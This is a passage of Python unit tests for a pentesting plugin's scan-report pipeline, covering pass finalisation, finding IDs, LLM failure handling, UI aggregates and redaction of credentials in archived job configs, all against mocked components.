+ plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + plugin._build_job_archive = MagicMock() + plugin._clear_live_progress = MagicMock() + plugin._log_audit_event = MagicMock() + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + self.assertEqual(job_specs["job_status"], "STOPPED") + 
self.assertIsNone(job_specs.get("next_pass_at")) + plugin._build_job_archive.assert_called_once_with(job_specs["job_id"], job_specs) + plugin._clear_live_progress.assert_called_once() + plugin._log_audit_event.assert_called_once_with("continuous_pass_cap_reached", { + "job_id": job_specs["job_id"], + "pass_nr": MAX_CONTINUOUS_PASSES, + "max_continuous_passes": MAX_CONTINUOUS_PASSES, + }) + event_types = [c.args[1] for c in plugin._emit_timeline_event.call_args_list] + self.assertIn("pass_cap_reached", event_types) + self.assertIn("stopped", event_types) + + def test_continuous_pass_cap_handles_recovered_over_cap_state(self): + """Recovered continuous jobs already over cap are stopped cleanly.""" + PentesterApi01Plugin = self._get_plugin_class() + plugin, job_specs = self._build_finalize_plugin( + run_mode="CONTINUOUS_MONITORING", + job_pass=MAX_CONTINUOUS_PASSES + 2, + ) + + report_a = self._sample_node_report(1, 512, [80]) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + "port_protocols": {"80": "http"}, + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com", "monitor_interval": 60}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 10, "breakdown": {}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + plugin._build_job_archive = MagicMock() + plugin._clear_live_progress = MagicMock() + plugin._log_audit_event = MagicMock() + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + self.assertEqual(job_specs["job_status"], "STOPPED") + 
plugin._build_job_archive.assert_called_once_with(job_specs["job_id"], job_specs) + plugin._log_audit_event.assert_called_once() + + def test_finding_id_deterministic(self): + """Same input produces same finding_id; different title produces different id.""" + PentesterApi01Plugin = self._get_plugin_class() + + aggregated = { + "open_ports": [80], "ports_scanned": 100, "nr_open_ports": 1, + "port_protocols": {"80": "http"}, + "service_info": { + "80": { + "_service_info_http": { + "findings": [ + {"title": "SQL Injection", "severity": "HIGH", "cwe_id": "CWE-89", "confidence": "firm"}, + ] + } + } + }, + "web_tests_info": {}, + "correlation_findings": [], + } + + risk1, findings1 = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated) + risk2, findings2 = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated) + + self.assertEqual(findings1[0]["finding_id"], findings2[0]["finding_id"]) + + # Different title → different finding_id + aggregated2 = { + "open_ports": [80], "ports_scanned": 100, "nr_open_ports": 1, + "port_protocols": {"80": "http"}, + "service_info": { + "80": { + "_service_info_http": { + "findings": [ + {"title": "XSS Vulnerability", "severity": "HIGH", "cwe_id": "CWE-79", "confidence": "firm"}, + ] + } + } + }, + "web_tests_info": {}, + "correlation_findings": [], + } + _, findings3 = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated2) + self.assertNotEqual(findings1[0]["finding_id"], findings3[0]["finding_id"]) + + def test_finding_id_cwe_collision(self): + """Same CWE, different title, same port+probe → different finding_ids.""" + PentesterApi01Plugin = self._get_plugin_class() + + aggregated = { + "open_ports": [80], "ports_scanned": 100, "nr_open_ports": 1, + "port_protocols": {"80": "http"}, + "service_info": { + "80": { + "_web_test_xss": { + "findings": [ + {"title": "Reflected XSS in search", "severity": "HIGH", "cwe_id": "CWE-79", "confidence": "certain"}, + {"title": "Stored XSS in comment", "severity": 
"HIGH", "cwe_id": "CWE-79", "confidence": "certain"}, + ] + } + } + }, + "web_tests_info": {}, + "correlation_findings": [], + } + + _, findings = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated) + self.assertEqual(len(findings), 2) + self.assertNotEqual(findings[0]["finding_id"], findings[1]["finding_id"]) + + def test_finding_enrichment_fields(self): + """Each finding has finding_id, port, protocol, probe, category.""" + PentesterApi01Plugin = self._get_plugin_class() + + aggregated = { + "open_ports": [443], "ports_scanned": 100, "nr_open_ports": 1, + "port_protocols": {"443": "https"}, + "service_info": { + "443": { + "_service_info_ssl": { + "findings": [ + {"title": "Weak TLS", "severity": "MEDIUM", "cwe_id": "CWE-326", "confidence": "certain"}, + ] + } + } + }, + "web_tests_info": {}, + "correlation_findings": [], + } + + _, findings = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated) + self.assertEqual(len(findings), 1) + f = findings[0] + self.assertIn("finding_id", f) + self.assertEqual(len(f["finding_id"]), 16) # 16-char hex + self.assertEqual(f["port"], 443) + self.assertEqual(f["protocol"], "https") + self.assertEqual(f["probe"], "_service_info_ssl") + self.assertEqual(f["category"], "service") + + def test_port_protocols_none(self): + """port_protocols is None → protocol defaults to 'unknown' (no crash).""" + PentesterApi01Plugin = self._get_plugin_class() + + aggregated = { + "open_ports": [22], "ports_scanned": 100, "nr_open_ports": 1, + "port_protocols": None, + "service_info": { + "22": { + "_service_info_ssh": { + "findings": [ + {"title": "Weak SSH key", "severity": "LOW", "cwe_id": "CWE-320", "confidence": "firm"}, + ] + } + } + }, + "web_tests_info": {}, + "correlation_findings": [], + } + + _, findings = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated) + self.assertEqual(len(findings), 1) + self.assertEqual(findings[0]["protocol"], "unknown") + + def test_llm_success_no_llm_failed(self): + 
"""LLM succeeds → llm_failed absent from serialized PassReport.""" + from extensions.business.cybersec.red_mesh.models import PassReport + + pr = PassReport( + pass_nr=1, date_started=1000.0, date_completed=1100.0, duration=100.0, + aggregated_report_cid="QmAgg", + worker_reports={}, + risk_score=50, + llm_analysis="# Analysis\nAll good.", + quick_summary="No critical issues found.", + llm_failed=None, # success + ) + d = pr.to_dict() + self.assertNotIn("llm_failed", d) + self.assertEqual(d["llm_analysis"], "# Analysis\nAll good.") + + def test_llm_failure_flag_and_timeline(self): + """LLM fails → llm_failed: True, timeline event added.""" + PentesterApi01Plugin = self._get_plugin_class() + plugin, job_specs = self._build_finalize_plugin(llm_enabled=True) + + report_a = self._sample_node_report(1, 512, [80]) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + "port_protocols": {}, + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 10, "breakdown": {}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + + # LLM returns None (failure) + plugin._run_aggregated_llm_analysis = MagicMock(return_value=None) + plugin._run_quick_summary_analysis = MagicMock(return_value=None) + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + # Check PassReport has llm_failed=True + pass_report_dict = plugin.r1fs.add_json.call_args_list[1][0][0] + self.assertTrue(pass_report_dict.get("llm_failed")) + + # Check timeline event was emitted for 
llm_failed + llm_failed_calls = [ + c for c in plugin._emit_timeline_event.call_args_list + if c[0][1] == "llm_failed" + ] + self.assertEqual(len(llm_failed_calls), 1) + # _emit_timeline_event(job_specs, "llm_failed", label, meta={"pass_nr": ...}) + call_kwargs = llm_failed_calls[0][1] # keyword args + meta = call_kwargs.get("meta", {}) + self.assertIn("pass_nr", meta) + + def test_non_retryable_llm_failure_skips_quick_summary(self): + """Permanent LLM request failures should not retry through quick summary.""" + PentesterApi01Plugin = self._get_plugin_class() + plugin, job_specs = self._build_finalize_plugin(llm_enabled=True) + + report_a = self._sample_node_report(1, 512, [80]) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + "port_protocols": {}, + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 10, "breakdown": {}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + plugin.P = MagicMock() + plugin._last_llm_analysis_status = None + + def _fail_main(*_args, **_kwargs): + plugin._last_llm_analysis_status = "provider_request_error" + return None + + plugin._run_aggregated_llm_analysis = MagicMock(side_effect=_fail_main) + plugin._run_quick_summary_analysis = MagicMock(return_value=None) + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + plugin._run_quick_summary_analysis.assert_not_called() + plugin.P.assert_any_call( + f"Skipping quick summary for job {job_specs['job_id']} after non-retryable LLM failure 
(provider_request_error)", + color='y' + ) + + def test_pass_reports_survive_typed_job_record_rewrites(self): + """Pass reports must stay attached after typed repository rewrites the job dict.""" + PentesterApi01Plugin = self._get_plugin_class() + plugin, job_specs = self._build_finalize_plugin() + job_specs["scan_type"] = "network" + job_specs["target_url"] = "" + plugin.chainstore_hget.return_value = job_specs + + report_a = self._sample_node_report(1, 512, [80]) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + "port_protocols": {"80": "http"}, + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com", "scan_type": "network"}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 10, "breakdown": {}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + plugin._build_job_archive = MagicMock() + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + self.assertEqual(len(job_specs["pass_reports"]), 1) + self.assertEqual(job_specs["pass_reports"][0]["pass_nr"], 1) + archived_job_specs = plugin._build_job_archive.call_args[0][1] + self.assertEqual(len(archived_job_specs["pass_reports"]), 1) + + def test_aggregated_report_write_failure(self): + """R1FS fails for aggregated → pass finalization skipped, no partial state.""" + PentesterApi01Plugin = self._get_plugin_class() + # First R1FS write (aggregated) returns None = failure + plugin, job_specs = self._build_finalize_plugin(r1fs_returns={1: None, 2: "QmPassCID"}) + + report_a = self._sample_node_report(1, 512, [80]) + 
plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + "port_protocols": {}, + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 0, "breakdown": {}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + # CStore should NOT have pass_reports appended + self.assertEqual(len(job_specs["pass_reports"]), 0) + # CStore hset was called for intermediate status updates (COLLECTING, ANALYZING, FINALIZING) + # but NOT for finalization — verify job_status is NOT FINALIZED in the last write + for call_args in plugin.chainstore_hset.call_args_list: + value = call_args.kwargs.get("value") or call_args[1].get("value") if len(call_args) > 1 else None + if isinstance(value, dict): + self.assertNotEqual(value.get("job_status"), "FINALIZED") + + def test_pass_report_write_failure(self): + """R1FS fails for pass report → CStore pass_reports not appended.""" + PentesterApi01Plugin = self._get_plugin_class() + # First R1FS write (aggregated) succeeds, second (pass report) fails + plugin, job_specs = self._build_finalize_plugin(r1fs_returns={1: "QmAggCID", 2: None}) + + report_a = self._sample_node_report(1, 512, [80]) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + 
"port_protocols": {}, + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 0, "breakdown": {}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + # CStore should NOT have pass_reports appended + self.assertEqual(len(job_specs["pass_reports"]), 0) + # CStore hset was called for status updates but NOT for finalization + for call_args in plugin.chainstore_hset.call_args_list: + value = call_args.kwargs.get("value") or call_args[1].get("value") if len(call_args) > 1 else None + if isinstance(value, dict): + self.assertNotEqual(value.get("job_status"), "FINALIZED") + + def test_cstore_risk_score_updated(self): + """After pass, risk_score on CStore matches pass result.""" + PentesterApi01Plugin = self._get_plugin_class() + plugin, job_specs = self._build_finalize_plugin() + + report_a = self._sample_node_report(1, 512, [80]) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + "port_protocols": {}, + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 42, "breakdown": {"findings_score": 30}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + + 
PentesterApi01Plugin._maybe_finalize_pass(plugin) + + # CStore risk_score updated + self.assertEqual(job_specs["risk_score"], 42) + + # PassReportRef in pass_reports has same risk_score + self.assertEqual(len(job_specs["pass_reports"]), 1) + ref = job_specs["pass_reports"][0] + self.assertEqual(ref["risk_score"], 42) + self.assertIn("report_cid", ref) + self.assertEqual(ref["pass_nr"], 1) + + + +class TestPhase4UiAggregate(unittest.TestCase): + """Phase 4: UI Aggregate Computation.""" + + @classmethod + def _mock_plugin_modules(cls): + if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: + return + mock_plugin_modules() + + def _get_plugin_class(self): + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + return PentesterApi01Plugin + + def _make_plugin(self): + plugin = MagicMock() + Plugin = self._get_plugin_class() + plugin._count_services = lambda si: Plugin._count_services(plugin, si) + plugin._dedupe_items = lambda items: Plugin._dedupe_items(items) + plugin._extract_graybox_ui_stats = lambda aggregated, latest_pass=None: Plugin._extract_graybox_ui_stats( + plugin, aggregated, latest_pass + ) + plugin._compute_ui_aggregate = lambda passes, agg, job_config=None: Plugin._compute_ui_aggregate( + plugin, passes, agg, job_config=job_config + ) + plugin.SEVERITY_ORDER = Plugin.SEVERITY_ORDER + plugin.CONFIDENCE_ORDER = Plugin.CONFIDENCE_ORDER + return plugin, Plugin + + def _make_finding(self, severity="HIGH", confidence="firm", finding_id="abc123", title="Test"): + return {"finding_id": finding_id, "severity": severity, "confidence": confidence, "title": title} + + def _make_pass(self, pass_nr=1, findings=None, risk_score=0, worker_reports=None): + return { + "pass_nr": pass_nr, + "risk_score": risk_score, + "risk_breakdown": {"findings_score": 10}, + "quick_summary": "Summary text", + "findings": findings, + "worker_reports": worker_reports or { + "w1": {"start_port": 1, 
"end_port": 512, "open_ports": [80]}, + }, + } + + def _make_aggregated(self, open_ports=None, service_info=None): + return { + "open_ports": open_ports or [80, 443], + "service_info": service_info or { + "80": {"_service_info_http": {"findings": []}}, + "443": {"_service_info_https": {"findings": []}}, + }, + } + + def _make_webapp_aggregated(self): + return { + "open_ports": [443], + "service_info": { + "443": { + "_graybox_discovery": { + "routes": ["/login", "/login", "/admin"], + "forms": [ + {"action": "/login", "method": "POST"}, + {"action": "/login", "method": "POST"}, + {"action": "/admin", "method": "POST"}, + ], + "findings": [], + }, + }, + }, + "graybox_results": { + "443": { + "_graybox_authz": { + "findings": [ + {"scenario_id": "S-1", "status": "vulnerable", "severity": "HIGH"}, + {"scenario_id": "S-2", "status": "not_vulnerable", "severity": "INFO"}, + {"scenario_id": "S-3", "status": "inconclusive", "severity": "INFO"}, + ], + }, + }, + }, + } + + def test_findings_count_uppercase_keys(self): + """findings_count keys are UPPERCASE.""" + plugin, _ = self._make_plugin() + findings = [ + self._make_finding(severity="CRITICAL", finding_id="f1"), + self._make_finding(severity="HIGH", finding_id="f2"), + self._make_finding(severity="HIGH", finding_id="f3"), + self._make_finding(severity="MEDIUM", finding_id="f4"), + ] + p = self._make_pass(findings=findings) + agg = self._make_aggregated() + result = plugin._compute_ui_aggregate([p], agg) + fc = result.to_dict()["findings_count"] + self.assertEqual(fc["CRITICAL"], 1) + self.assertEqual(fc["HIGH"], 2) + self.assertEqual(fc["MEDIUM"], 1) + for key in fc: + self.assertEqual(key, key.upper()) + + def test_top_findings_max_10(self): + """More than 10 CRITICAL+HIGH -> capped at 10.""" + plugin, _ = self._make_plugin() + findings = [self._make_finding(severity="CRITICAL", finding_id=f"f{i}") for i in range(15)] + p = self._make_pass(findings=findings) + agg = self._make_aggregated() + result = 
plugin._compute_ui_aggregate([p], agg) + self.assertEqual(len(result.to_dict()["top_findings"]), 10) + + def test_top_findings_sorted(self): + """CRITICAL before HIGH, within same severity sorted by confidence.""" + plugin, _ = self._make_plugin() + findings = [ + self._make_finding(severity="HIGH", confidence="certain", finding_id="f1", title="H-certain"), + self._make_finding(severity="CRITICAL", confidence="tentative", finding_id="f2", title="C-tentative"), + self._make_finding(severity="HIGH", confidence="tentative", finding_id="f3", title="H-tentative"), + self._make_finding(severity="CRITICAL", confidence="certain", finding_id="f4", title="C-certain"), + ] + p = self._make_pass(findings=findings) + agg = self._make_aggregated() + result = plugin._compute_ui_aggregate([p], agg) + top = result.to_dict()["top_findings"] + self.assertEqual(top[0]["title"], "C-certain") + self.assertEqual(top[1]["title"], "C-tentative") + self.assertEqual(top[2]["title"], "H-certain") + self.assertEqual(top[3]["title"], "H-tentative") + + def test_top_findings_excludes_medium(self): + """MEDIUM/LOW/INFO findings never in top_findings.""" + plugin, _ = self._make_plugin() + findings = [ + self._make_finding(severity="MEDIUM", finding_id="f1"), + self._make_finding(severity="LOW", finding_id="f2"), + self._make_finding(severity="INFO", finding_id="f3"), + ] + p = self._make_pass(findings=findings) + agg = self._make_aggregated() + result = plugin._compute_ui_aggregate([p], agg) + d = result.to_dict() + self.assertNotIn("top_findings", d) # stripped by _strip_none (None) + + def test_finding_timeline_single_pass(self): + """1 pass -> finding_timeline is None (stripped).""" + plugin, _ = self._make_plugin() + p = self._make_pass(findings=[]) + agg = self._make_aggregated() + result = plugin._compute_ui_aggregate([p], agg) + d = result.to_dict() + self.assertNotIn("finding_timeline", d) # None → stripped + + def test_finding_timeline_multi_pass(self): + """3 passes with overlapping 
findings -> correct first_seen, last_seen, pass_count.""" + plugin, _ = self._make_plugin() + f_persistent = self._make_finding(finding_id="persist1") + f_transient = self._make_finding(finding_id="transient1") + f_new = self._make_finding(finding_id="new1") + passes = [ + self._make_pass(pass_nr=1, findings=[f_persistent, f_transient]), + self._make_pass(pass_nr=2, findings=[f_persistent]), + self._make_pass(pass_nr=3, findings=[f_persistent, f_new]), + ] + agg = self._make_aggregated() + result = plugin._compute_ui_aggregate(passes, agg) + ft = result.to_dict()["finding_timeline"] + self.assertEqual(ft["persist1"]["first_seen"], 1) + self.assertEqual(ft["persist1"]["last_seen"], 3) + self.assertEqual(ft["persist1"]["pass_count"], 3) + self.assertEqual(ft["transient1"]["first_seen"], 1) + self.assertEqual(ft["transient1"]["last_seen"], 1) + self.assertEqual(ft["transient1"]["pass_count"], 1) + self.assertEqual(ft["new1"]["first_seen"], 3) + self.assertEqual(ft["new1"]["last_seen"], 3) + self.assertEqual(ft["new1"]["pass_count"], 1) + + def test_zero_findings(self): + """findings_count is {}, top_findings is [], total_findings is 0.""" + plugin, _ = self._make_plugin() + p = self._make_pass(findings=[]) + agg = self._make_aggregated() + result = plugin._compute_ui_aggregate([p], agg) + d = result.to_dict() + self.assertEqual(d["total_findings"], 0) + # findings_count and top_findings are None (stripped) when empty + self.assertNotIn("findings_count", d) + self.assertNotIn("top_findings", d) + + def test_open_ports_sorted_unique(self): + """total_open_ports is deduped and sorted.""" + plugin, _ = self._make_plugin() + p = self._make_pass(findings=[]) + agg = self._make_aggregated(open_ports=[443, 80, 443, 22, 80]) + result = plugin._compute_ui_aggregate([p], agg) + self.assertEqual(result.to_dict()["total_open_ports"], [22, 80, 443]) + + def test_count_services(self): + """_count_services counts ports with at least one detected service.""" + plugin, _ = 
self._make_plugin() + service_info = { + "80": {"_service_info_http": {}, "_web_test_xss": {}}, + "443": {"_service_info_https": {}, "_service_info_http": {}}, + } + self.assertEqual(plugin._count_services(service_info), 2) + self.assertEqual(plugin._count_services({}), 0) + self.assertEqual(plugin._count_services(None), 0) + + def test_webapp_graybox_fields_populated(self): + """Webapp aggregates include scan_type, discovery counts, and scenario stats.""" + plugin, _ = self._make_plugin() + p = self._make_pass( + findings=[self._make_finding(severity="HIGH", finding_id="gb1")], + worker_reports={"w1": {"start_port": 443, "end_port": 443, "open_ports": [443]}}, + ) + p["scan_metrics"] = { + "scenarios_total": 3, + "scenarios_vulnerable": 1, + } + agg = self._make_webapp_aggregated() + + result = plugin._compute_ui_aggregate([p], agg, job_config={"scan_type": "webapp"}).to_dict() + self.assertEqual(result["scan_type"], "webapp") + self.assertEqual(result["total_routes_discovered"], 2) + self.assertEqual(result["total_forms_discovered"], 2) + self.assertEqual(result["total_scenarios"], 3) + self.assertEqual(result["total_scenarios_vulnerable"], 1) + + + +class TestPhase3Archive(unittest.TestCase): + """Phase 3: Job Close & Archive.""" + + @classmethod + def _mock_plugin_modules(cls): + if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: + return + mock_plugin_modules() + + def _get_plugin_class(self): + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + return PentesterApi01Plugin + + def _build_archive_plugin(self, job_id="test-job", pass_count=1, run_mode="SINGLEPASS", + job_status="FINALIZED", r1fs_write_fail=False, r1fs_verify_fail=False): + """Build a mock plugin pre-configured for _build_job_archive testing.""" + plugin = MagicMock() + plugin.ee_addr = "launcher-node" + plugin.ee_id = "launcher-alias" + plugin.cfg_instance_id = "test-instance" + plugin.time.return_value 
= 1000200.0 + plugin.json_dumps.return_value = "{}" + + # R1FS mock + plugin.r1fs = MagicMock() + + # Build pass report dicts and refs + pass_reports_data = [] + pass_report_refs = [] + for i in range(1, pass_count + 1): + pr = { + "pass_nr": i, + "date_started": 1000000.0 + (i - 1) * 100, + "date_completed": 1000000.0 + i * 100, + "duration": 100.0, + "aggregated_report_cid": f"QmAgg{i}", + "worker_reports": { + "worker-A": {"report_cid": f"QmWorker{i}A", "start_port": 1, "end_port": 512, "ports_scanned": 512, "open_ports": [80], "nr_findings": 2}, + }, + "risk_score": 25 + i, + "risk_breakdown": {"findings_score": 10}, + "findings": [ + {"finding_id": f"f{i}a", "severity": "HIGH", "confidence": "firm", "title": f"Finding {i}A"}, + {"finding_id": f"f{i}b", "severity": "MEDIUM", "confidence": "firm", "title": f"Finding {i}B"}, + ], + "scan_metrics": { + "scenarios_total": 2, + "scenarios_vulnerable": 1, + }, + "quick_summary": f"Summary for pass {i}", + } + pass_reports_data.append(pr) + pass_report_refs.append({"pass_nr": i, "report_cid": f"QmPassReport{i}", "risk_score": 25 + i}) + + # Job config + job_config = { + "target": "example.com", "start_port": 1, "end_port": 1024, + "run_mode": run_mode, "enabled_features": [], "scan_type": "webapp", + "target_url": "https://example.com/app", + "redact_credentials": True, + "official_username": "admin", + "official_password": "super-secret", + "regular_username": "user", + "regular_password": "user-pass", + "weak_candidates": ["admin:admin", "user:user"], + } + + # Latest aggregated data + latest_aggregated = { + "open_ports": [80, 443], + "service_info": { + "80": {"_service_info_http": {}}, + "443": { + "_graybox_discovery": { + "routes": ["/login", "/admin", "/login"], + "forms": [ + {"action": "/login", "method": "POST"}, + {"action": "/admin", "method": "POST"}, + {"action": "/admin", "method": "POST"}, + ], + }, + }, + }, + "web_tests_info": {}, + "graybox_results": { + "443": { + "_graybox_test": { + "findings": 
[ + {"scenario_id": "S1", "status": "vulnerable"}, + {"scenario_id": "S2", "status": "not_vulnerable"}, + ], + }, + }, + }, + "completed_tests": ["port_scan"], + "ports_scanned": 1024, + } + + # R1FS get_json: return the right data for each CID + cid_map = {"QmConfigCID": job_config} + for i, pr in enumerate(pass_reports_data): + cid_map[f"QmPassReport{i+1}"] = pr + cid_map[f"QmAgg{i+1}"] = latest_aggregated + + if r1fs_write_fail: + plugin.r1fs.add_json.return_value = None + else: + archive_cid = "QmArchiveCID" + plugin.r1fs.add_json.return_value = archive_cid + if r1fs_verify_fail: + # add_json succeeds but get_json for the archive CID returns None + orig_map = dict(cid_map) + def verify_fail_get(cid): + if cid == archive_cid: + return None + return orig_map.get(cid) + plugin.r1fs.get_json.side_effect = verify_fail_get + else: + # Verification succeeds — archive CID also returns data + cid_map[archive_cid] = {"job_id": job_id} # minimal archive for verification + plugin.r1fs.get_json.side_effect = lambda cid: cid_map.get(cid) + + if not r1fs_write_fail and not r1fs_verify_fail: + plugin.r1fs.get_json.side_effect = lambda cid: cid_map.get(cid) + + # Job specs (running state) + job_specs = { + "job_id": job_id, + "job_status": job_status, + "job_pass": pass_count, + "run_mode": run_mode, + "launcher": "launcher-node", + "launcher_alias": "launcher-alias", + "target": "example.com", + "scan_type": "webapp", + "target_url": "https://example.com/app", + "task_name": "Test", + "start_port": 1, + "end_port": 1024, + "date_created": 1000000.0, + "risk_score": 25 + pass_count, + "job_config_cid": "QmConfigCID", + "workers": { + "worker-A": {"start_port": 1, "end_port": 512, "finished": True, "report_cid": "QmReportA"}, + }, + "timeline": [ + {"type": "created", "label": "Created", "date": 1000000.0, "actor": "launcher-alias", "actor_type": "system", "meta": {}}, + ], + "pass_reports": pass_report_refs, + } + + plugin.chainstore_hset = MagicMock() + + # Bind real methods 
for archive building + Plugin = self._get_plugin_class() + plugin._compute_ui_aggregate = lambda passes, agg, job_config=None: Plugin._compute_ui_aggregate( + plugin, passes, agg, job_config=job_config + ) + plugin._count_services = lambda si: Plugin._count_services(plugin, si) + plugin._dedupe_items = lambda items: Plugin._dedupe_items(items) + plugin._extract_graybox_ui_stats = lambda aggregated, latest_pass=None: Plugin._extract_graybox_ui_stats( + plugin, aggregated, latest_pass + ) + plugin.SEVERITY_ORDER = Plugin.SEVERITY_ORDER + plugin.CONFIDENCE_ORDER = Plugin.CONFIDENCE_ORDER + plugin._redact_job_config = lambda d: Plugin._redact_job_config(d) + + return plugin, job_specs, pass_reports_data, job_config + + def test_archive_written_to_r1fs(self): + """Archive stored in R1FS with job_id, job_config, passes, ui_aggregate.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, job_config = self._build_archive_plugin() + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + # r1fs.add_json called with archive dict + self.assertTrue(plugin.r1fs.add_json.called) + archive_dict = plugin.r1fs.add_json.call_args[0][0] + self.assertEqual(archive_dict["archive_version"], JOB_ARCHIVE_VERSION) + self.assertEqual(archive_dict["job_id"], "test-job") + self.assertEqual(archive_dict["job_config"]["target"], "example.com") + self.assertEqual(len(archive_dict["passes"]), 1) + self.assertIn("ui_aggregate", archive_dict) + self.assertIn("total_open_ports", archive_dict["ui_aggregate"]) + + def test_archive_ui_aggregate_includes_graybox_summary(self): + """Archive UI aggregate preserves graybox scan metadata and scenario counts.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin() + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + archive_dict = plugin.r1fs.add_json.call_args[0][0] + ui = archive_dict["ui_aggregate"] + self.assertEqual(ui["scan_type"], "webapp") + 
self.assertEqual(ui["total_routes_discovered"], 2) + self.assertEqual(ui["total_forms_discovered"], 2) + self.assertEqual(ui["total_scenarios"], 2) + self.assertEqual(ui["total_scenarios_vulnerable"], 1) + + def test_archive_redacts_job_config_credentials(self): + """Archived job_config masks credentials when redact_credentials is enabled.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin() + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + archive_dict = plugin.r1fs.add_json.call_args[0][0] + self.assertEqual(archive_dict["job_config"]["official_password"], "***") + self.assertEqual(archive_dict["job_config"]["regular_password"], "***") + self.assertEqual(archive_dict["job_config"]["weak_candidates"], ["***", "***"]) + self.assertEqual(archive_dict["job_config"]["official_username"], "admin") + + def test_archive_redaction_removes_secret_ref(self): + """Archived job_config does not expose secret_ref references.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin() + plugin.r1fs.get_json.side_effect = [ + { + "target": 